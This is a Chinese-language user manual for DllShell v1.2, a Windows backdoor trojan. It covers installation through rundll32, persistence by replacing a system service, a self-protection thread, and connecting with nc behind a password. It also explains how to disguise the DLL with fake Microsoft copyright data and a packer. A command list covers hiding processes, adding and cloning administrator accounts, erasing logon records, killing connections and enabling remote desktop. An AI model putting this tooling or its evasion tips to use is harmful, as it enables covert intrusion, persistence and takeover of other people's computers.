DllShell v1.2
nop <a href="http://www.ph4nt0m.org" target="_blank">www.ph4nt0m.org</a>
有几个功能函数是参考&修改于Nameless Shell的代码,在此对作者的开源精神表示感谢.
如果发现任何bug或者有任何建议,请和我联系,谢谢!
后门使用
========================================================================
配置:
setdll.exe -w dllshell.dll //写入后门配置
setdll.exe -r dllshell.dll //读取后门配置
安装:
rundll32 dllshell.dll,I password //I和password之间只有一个空格
卸载:
rundll32 dllshell.dll,R password //然后重启即可
Q&A
=========================================================================
Q: DllShell的启动方式?
A: 后门采用替换系统原有服务的方法实现自启动,请替换服务前,确定该服务存在,否则后门可能安装失败.
Q: 如何知道后门安装成功?
A: 确认是否安装成功,请查看system32目录下面生成的dllshell.log文件,里面有安装过程的信息.
后门运行过程中不会生成log,请放心使用 :-)
Q: 如何卸载后门?
A: 后门启动时自动开启了自我保护线程(包括注册表项, 自身dll文件保护, IP变更通知).
如果要卸载后门,请先执行shield off命令,挂起保护线程,然后重启机器即可.
Q: 如何连接后门?
A: 连接后门请使用nc或者putty,使用系统自带的telnet是无法连接上后门的.
(why? telnet是一个字符一个字符发送,nc是在用户按下Enter后将用户缓冲一次发出)
正连或者反连成功后,没有任何提示符,请输入正确密码,即可看见欢迎banner.
还要注意的是,如果连上10s内没有输入密码,后门会自动断开
Q: 如何配置后门?
A: 请在dllshell.ini里面填写适当的信息,然后用setdll.exe -w dllshell.dll将配置写入
如果不放心写入的信息,可以用setdll.exe -r dllshell.dll 查看写入的配置
Q: 如何让后门融入系统dll大家庭?
A: 你可以用资源修改工具如ResHacker或者Restorator给dll添加上Microsoft的版权信息.
如果想使后门更小巧,请用WinUpack等工具压缩即可.
Q: 后门有哪些特点?
A: 请看后面的命令说明,功能还是挺全的.而且有时间还会不断添加.
命令详细说明
===========================================================================
ps -l
枚举进程
ps -k <PID|ProcName>
结束进程,可用PID或者进程名
ps -d <PID|ProcName>
在结束进程的基础上,然后删除进程的映象文件,可以对付某些弱智
木马 :-)
ps -m <PID|ProcName>
列举指定进程的模块,包括模块名(Module Name) 加载基址(Base Address)和映象路径(ImagePath)
ps -mv <PID|ProcName>
列举指定进程的模块,包括模块名(Module Name) 和文件版本号(FileVerison),
比如:
Module FileVersion
=============================================================================
USER32.dll 5.00.2195.6897
ps -md <PID|ProcName>
列举指定进程的模块,包括模块名(Module Name) 和文件描述(FileDescription)
比如:
Module FileVersion
=============================================================================
USER32.dll Windows 2000 USER API Client DLL
ps -mc <PID|ProcName>
列举指定进程的模块,包括模块名(Module Name) 和公司名称(CompanyName)
比如:
Module CompanyName
=============================================================================
USER32.dll Microsoft Corporation
ps -h <PID|ProcName>
隐藏指定的进程,可用PID或者进程名
此段代码非我写,改写自pjf的HideProcess.cpp,自然不能过Icesword :-)
User -e
枚举系统用户
User -a <UserName> [UserPassword]
添加指定用户到Administrators组,并且密码永不过期, 如果不指定UserPassword,则为空密码
User -d <UserName>
删除指定用户
User -n <UserName>
将指定用户的"上次登录"改为"从不",同时修改该用户成功登录次数为0
User -c <Src_UserName> <Dest_UserName> [Dest_UserPassword]
克隆帐号,也可恢复克隆的帐号,将Src_UserName,Dest_UserName同时设为Dest_UserName即可恢复克隆的帐号.
User -cc
检测克隆帐号
Netstat -t
枚举TCP连接
Netstat -te
只列出Established状态的TCP连接
Netstat -u
枚举UDP本地端口
Netstat -a
等于Netstat -t 加上Netstat -u
Netstat -k <Local_IP:Local_Port> <Remote_IP:Remote_Port>
断开已经建立的TCP连接(IP,端口用:隔开即可)
比如
netstat -k 192.168.0.1:3333 192.168.0.2:4444
Svc -ew
枚举Win32服务
Svc -es
枚举Driver服务
Svc -start <ServiceName>
启动指定服务
Svc -stop <ServiceName>
停止指定服务
Svc -d <ServiceName>
删除指定服务
Svc -c <ServiceName> <ServiceType>
设置服务的启动方式
ServiceType为: Auto/Demand/Disable(自动/手动/禁用)
Svc -q <ServiceName>
查询指定服务的详细信息.
比如svc -q w32time, 返回如下信息:
Service Information:
---------------------------------------
ServiceName: bits
DisplayName: Background Intelligent Transfer Service
Description: 用闲置网络带宽在后台传输文件。如果此服务被禁用,那么任何依赖于
BITS 的功能,例如 Windows Update 或 MSN Explorer,都将不能自动
下载程序和其它信息。
ImagePath: C:WINNTSystem32svchost.exe -k BITSgroup
ServiceDll: C:WINNTSystem32qmgr.dll
StartName: LocalSystem
Dependencies: LanmanWorkstation Rpcss SENS Wmi
ErrorControl: Normal
StartType: Manual
CurrentState: Stopped
Service Information Complete.
Shutdown -i <Message> [TimeOut]
初始化关机过程,Message为显示给当前用户的消息,如果TimeOut未指定,默认为60s.
Shutdown -a
取消关机过程.
Shutdown -r
重启
Shutdown -s
关机
Shutdown -p
关闭电源
Shutdown -l
注销
Term -i [Port]
安装终端服务,如果Port不指定,默认为3389.
Term -p [Port]
更改终端服务端口,如果Port未指定,则查询当前终端服务端口.
--------------------------------------------------------------------------------------
[推荐]后门木马DllShell v1.3的使用详解
您现在的位置: